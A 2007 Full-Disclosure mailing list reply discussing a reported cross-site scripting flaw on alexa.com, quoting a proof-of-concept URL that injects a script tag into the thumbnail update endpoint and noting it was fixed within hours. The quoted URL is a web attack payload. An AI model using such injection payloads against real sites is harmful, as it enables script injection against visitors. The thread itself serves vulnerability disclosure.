
Date: Wed, 30 May 2007 01:28:44 +0200
From: "michele.sandrelli@...amail.com" <michele.sandrelli@...amail.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: alexa.com XSS

kefka wrote:
> Seems fixed or doesn't work in FireFox 1.5.0.11
> -----------------------
> MC Iglo wrote:
>>
http://thumbnails.alexa.com/update_thumbnail?url=%3Cscript%3Ealert(%22alexa%20sucks%22)%3C/script%3E

It worked perfectly until.. they fixed it : )

Note: It seems that alexa people grep logs or is subscribed to fd since
it worked only for 1-2 hours.

Bye,
Michele Sandrelli

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
